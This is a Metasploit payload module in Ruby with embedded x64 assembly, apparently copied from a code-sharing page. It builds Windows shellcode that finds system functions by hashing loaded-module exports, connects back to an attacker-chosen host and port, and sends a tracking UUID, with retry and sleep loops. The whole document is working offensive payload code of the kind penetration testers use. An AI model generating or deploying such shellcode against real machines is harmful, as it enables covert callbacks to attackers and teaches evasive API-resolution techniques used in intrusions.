Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7

8
  CachedSize = 425
9

10
  include Msf::Payload::Windows
11
  include Msf::Payload::Single
12
  include Msf::Payload::Pingback
13
  include Msf::Payload::Pingback::Options
14
  include Msf::Payload::Windows::BlockApi_x64
15
  include Msf::Payload::Windows::Exitfunk_x64
16

17
  def initialize(info = {})
18
    super(merge_info(info,
19
      'Name'          => 'Windows x64 Pingback, Reverse TCP Inline',
20
      'Description'   => 'Connect back to attacker and report UUID (Windows x64)',
21
      'Author'        => [ 'bwatters-r7' ],
22
      'License'       => MSF_LICENSE,
23
      'Platform'      => 'win',
24
      'Arch'          => ARCH_X64,
25
      'Handler'       => Msf::Handler::ReverseTcp,
26
      'Session'       => Msf::Sessions::Pingback
27
    ))
28

29
    def required_space
30
      # Start with our cached default generated size
31
      space = cached_size
32

33
      # EXITFUNK 'seh' is the worst case, that adds 15 bytes
34
      space += 15
35

36
      space
37
    end
38

39
    def generate(_opts = {})
40
      # 22 -> "0x00,0x16"
41
      # 4444 -> "0x11,0x5c"
42
      encoded_port = [datastore['LPORT'].to_i, 2].pack("vn").unpack("N").first
43
      encoded_host = Rex::Socket.addr_aton(datastore['LHOST'] || "127.127.127.127").unpack("V").first
44
      encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port]
45
      retry_count = [datastore['ReverseConnectRetries'].to_i, 1].max
46
      pingback_count = datastore['PingbackRetries']
47
      pingback_sleep = datastore['PingbackSleep']
48
      self.pingback_uuid ||= self.generate_pingback_uuid
49
      uuid_as_db = "0x" + self.pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")
50
      conf = { exitfunk: datastore['EXITFUNC'] }
51

52

53
      asm = %Q^
54
        cld                     ; Clear the direction flag.
55
        and rsp, ~0xF           ;  Ensure RSP is 16 byte aligned
56
        call start              ; Call start, this pushes the address of 'api_call' onto the stack.
57

58
        api_call:
59
          push r9                  ; Save the 4th parameter
60
          push r8                  ; Save the 3rd parameter
61
          push rdx                 ; Save the 2nd parameter
62
          push rcx                 ; Save the 1st parameter
63
          push rsi                 ; Save RSI
64
          xor rdx, rdx             ; Zero rdx
65
          mov rdx, [gs:rdx+96]     ; Get a pointer to the PEB
66
          mov rdx, [rdx+24]        ; Get PEB->Ldr
67
          mov rdx, [rdx+32]        ; Get the first module from the InMemoryOrder module list
68
        next_mod:                  ;
69
          mov rsi, [rdx+80]        ; Get pointer to modules name (unicode string)
70
          movzx rcx, word [rdx+74] ; Set rcx to the length we want to check
71
          xor r9, r9               ; Clear r9 which will store the hash of the module name
72
        loop_modname:              ;
73
          xor rax, rax             ; Clear rax
74
          lodsb                    ; Read in the next byte of the name
75
          cmp al, 'a'              ; Some versions of Windows use lower case module names
76
          jl not_lowercase         ;
77
          sub al, 0x20             ; If so normalise to uppercase
78
        not_lowercase:             ;
79
          ror r9d, 13              ; Rotate right our hash value
80
          add r9d, eax             ; Add the next byte of the name
81
          loop loop_modname        ; Loop until we have read enough
82
          ; We now have the module hash computed
83
          push rdx                 ; Save the current position in the module list for later
84
          push r9                  ; Save the current module hash for later
85
          ; Proceed to iterate the export address table,
86
          mov rdx, [rdx+32]        ; Get this modules base address
87
          mov eax, dword [rdx+60]  ; Get PE header
88
          add rax, rdx             ; Add the modules base address
89
          cmp word [rax+24], 0x020B ; is this module actually a PE64 executable?
90
          ; this test case covers when running on wow64 but in a native x64 context via nativex64.asm and
91
          ; their may be a PE32 module present in the PEB's module list, (typically the main module).
92
          ; as we are using the win64 PEB ([gs:96]) we wont see the wow64 modules present in the win32 PEB ([fs:48])
93
          jne get_next_mod1         ; if not, proceed to the next module
94
          mov eax, dword [rax+136] ; Get export tables RVA
95
          test rax, rax            ; Test if no export address table is present
96
          jz get_next_mod1         ; If no EAT present, process the next module
97
          add rax, rdx             ; Add the modules base address
98
          push rax                 ; Save the current modules EAT
99
          mov ecx, dword [rax+24]  ; Get the number of function names
100
          mov r8d, dword [rax+32]  ; Get the rva of the function names
101
          add r8, rdx              ; Add the modules base address
102
          ; Computing the module hash + function hash
103
        get_next_func:             ;
104
          jrcxz get_next_mod       ; When we reach the start of the EAT (we search backwards), process the next module
105
          dec rcx                  ; Decrement the function name counter
106
          mov esi, dword [r8+rcx*4]; Get rva of next module name
107
          add rsi, rdx             ; Add the modules base address
108
          xor r9, r9               ; Clear r9 which will store the hash of the function name
109
          ; And compare it to the one we want
110
        loop_funcname:             ;
111
          xor rax, rax             ; Clear rax
112
          lodsb                    ; Read in the next byte of the ASCII function name
113
          ror r9d, 13              ; Rotate right our hash value
114
          add r9d, eax             ; Add the next byte of the name
115
          cmp al, ah               ; Compare AL (the next byte from the name) to AH (null)
116
          jne loop_funcname        ; If we have not reached the null terminator, continue
117
          add r9, [rsp+8]          ; Add the current module hash to the function hash
118
          cmp r9d, r10d            ; Compare the hash to the one we are searchnig for
119
          jnz get_next_func        ; Go compute the next function hash if we have not found it
120
          ; If found, fix up stack, call the function and then value else compute the next one...
121
          pop rax                  ; Restore the current modules EAT
122
          mov r8d, dword [rax+36]  ; Get the ordinal table rva
123
          add r8, rdx              ; Add the modules base address
124
          mov cx, [r8+2*rcx]       ; Get the desired functions ordinal
125
          mov r8d, dword [rax+28]  ; Get the function addresses table rva
126
          add r8, rdx              ; Add the modules base address
127
          mov eax, dword [r8+4*rcx]; Get the desired functions RVA
128
          add rax, rdx             ; Add the modules base address to get the functions actual VA
129
          ; We now fix up the stack and perform the call to the drsired function...
130
        finish:
131
          pop r8                   ; Clear off the current modules hash
132
          pop r8                   ; Clear off the current position in the module list
133
          pop rsi                  ; Restore RSI
134
          pop rcx                  ; Restore the 1st parameter
135
          pop rdx                  ; Restore the 2nd parameter
136
          pop r8                   ; Restore the 3rd parameter
137
          pop r9                   ; Restore the 4th parameter
138
          pop r10                  ; pop off the return address
139
          sub rsp, 32              ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
140
                                   ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
141
          push r10                 ; push back the return address
142
          jmp rax                  ; Jump into the required function
143
          ; We now automagically return to the correct caller...
144
        get_next_mod:              ;
145
          pop rax                  ; Pop off the current (now the previous) modules EAT
146
        get_next_mod1:             ;
147
          pop r9                   ; Pop off the current (now the previous) modules hash
148
          pop rdx                  ; Restore our position in the module list
149
          mov rdx, [rdx]           ; Get the next module
150
          jmp next_mod             ; Process this module
151

152
        start:
153
          pop rbp               ; block API pointer
154

155
        reverse_tcp:
156
        ; setup the structures we need on the stack...
157
          mov r14, 'ws2_32'
158
          push r14                ; Push the bytes 'ws2_32',0,0 onto the stack.
159
          mov r14, rsp            ; save pointer to the "ws2_32" string for LoadLibraryA call.
160
          sub rsp, #{408 + 8}     ; alloc sizeof( struct WSAData ) bytes for the WSAData
161
                                  ; structure (+8 for alignment)
162
          mov r13, rsp            ; save pointer to the WSAData structure for WSAStartup call.
163
          mov r12, #{encoded_host_port}
164
          push r12                ; host, family AF_INET and port
165
          mov r12, rsp            ; save pointer to sockaddr struct for connect call
166

167
        ; perform the call to LoadLibraryA...
168
          mov rcx, r14            ; set the param for the library to load
169
          mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
170
          call rbp                ; LoadLibraryA( "ws2_32" )
171

172
        ; perform the call to WSAStartup...
173
          mov rdx, r13            ; second param is a pointer to this struct
174
          push 0x0101             ;
175
          pop rcx                 ; set the param for the version requested
176
          mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
177
          call rbp                ; WSAStartup( 0x0101, &WSAData );
178

179
        ; stick the retry count on the stack and store it
180
          push #{retry_count}     ; retry counter
181
          pop r14
182
          push #{pingback_count}
183
          pop r15
184

185
        create_socket:
186
        ; perform the call to WSASocketA...
187
          push rax                ; if we succeed, rax will be zero, push zero for the flags param.
188
          push rax                ; push null for reserved parameter
189
          xor r9, r9              ; we do not specify a WSAPROTOCOL_INFO structure
190
          xor r8, r8              ; we do not specify a protocol
191
          inc rax                 ;
192
          mov rdx, rax            ; push SOCK_STREAM
193
          inc rax                 ;
194
          mov rcx, rax            ; push AF_INET
195
          mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
196
          call rbp                ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
197
          mov rdi, rax            ; save the socket for later
198

199
        try_connect:
200
        ; perform the call to connect...
201
          push 16                 ; length of the sockaddr struct
202
          pop r8                  ; pop off the third param
203
          mov rdx, r12            ; set second param to pointer to sockaddr struct
204
          mov rcx, rdi            ; the socket
205
          mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
206
          call rbp                ; connect( s, &sockaddr, 16 );
207

208
          test eax, eax           ; non-zero means failure
209
          jz connected
210

211
        handle_connect_failure:
212
          dec r14                 ; decrement the retry count
213
          jnz try_connect
214
          dec r15
215
          jmp close_socket
216

217
        failure:
218
          call exitfunk
219

220
        ; this label is required so that reconnect attempts include
221
        ; the UUID stuff if required.
222
        connected:
223

224
        send_pingback:
225
          xor r9, r9              ; flags
226
          push #{uuid_as_db.split(",").length} ; length of the PINGBACK UUID
227
          pop r8
228
          call get_pingback_address  ; put uuid buffer on the stack
229
          db #{uuid_as_db}  ; PINGBACK_UUID
230

231
        get_pingback_address:
232
          pop rdx                ; PINGBACK UUID address
233
          mov rcx, rdi           ; Socket handle
234
          mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
235
          call rbp               ; call send
236

237
        close_socket:
238
          mov rcx, rdi           ; Socket handle
239
          mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
240
          call rbp               ; call closesocket
241
        ^
242
      if pingback_count > 0
243
        asm << %Q^
244
          sleep:
245
            test r15, r15         ; check pingback retry counter
246
            jz exitfunk           ; bail if we are at 0
247
            dec r15               ;decrement the pingback retry counter
248
            push #{(pingback_sleep * 1000)}            ; 10 seconds
249
            pop rcx               ; set the sleep function parameter
250
            mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
251
            call rbp              ; Sleep()
252
            jmp create_socket     ; repeat callback
253
        ^
254
      end
255
      if conf[:exitfunk]
256
        asm << asm_exitfunk(conf)
257
      end
258
      Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
259
    end
260
  end
261
end
262

263